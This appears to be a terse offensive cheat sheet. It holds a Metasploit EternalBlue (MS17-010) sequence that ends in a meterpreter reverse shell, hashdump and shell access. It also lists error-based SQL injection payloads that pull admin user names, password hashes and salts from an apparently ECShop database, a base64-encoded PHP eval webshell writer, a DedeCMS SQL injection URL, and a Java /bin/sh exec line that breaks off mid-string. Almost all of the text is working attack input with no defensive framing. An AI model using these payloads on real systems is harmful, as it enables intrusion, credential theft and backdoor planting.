1、blue
msf> search ms17-010
use auxiliary/smb/smb_ms17_010
show options
set rhosts 192.168.100.1/24
set threads 50
exploit
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOST 192.168.100.192
exploit
set payload windows/x64/meterpreter/reverse_tcp
exploit
meterpreter>getuid
meterpreter>hashdump
meterpreter>shell
2、order_id=1 or updatexml(1, concat(0x7e, (user())),0) or 1#
order_id=1 or updatexml(1, concat(0x7e, (database())),0) or 1#
order_id=1 or extractvalue(1, concat(0x7e, (select distinct concat(0x23, user_name, 0x23) from ecs_admin_user limit 0,1))) or 1#
order_id=1 or extractvalue(1, concat(0x7e, (select distinct concat(0x23, password, 0x23) from ecs_admin_user limit 0,1))) or 1#
order_id=1 or extractvalue(1, concat(0x7e, substring((select distinct concat(0x23, password,0x23) from ecs_admin_user limit 0,1), 3,40))) or 1#
order_id=1 or extractvalue(1, concat(0x7e, (select distinct concat(0x23, ec_salt,0x23) from ecs_admin_user limit 0,1))) or 1#
${${fputs(fopen(base64_decode(dGVzdC5waHA),w), base64_decode(PD9waHAgZXZhbCgkX1BPU1RbdGVzdF0pPz4))}}
/plus/recommend.php?aid=1 & _FILES[type][name] & _FILES[type][size] &_FILES[type][type] & _FILES[type][tmp_name]=aa \ %27and+char(@'%27')+/*50000Union*/+/*!50000SeLect*/+1,2,3,group_concat(userid, 0x23,pwd),5,6,7,8,9%20from%20'%23@_admin'%23
Runtime.getRuntime().exec(new String[ ] {"/bin/sh", "-c", "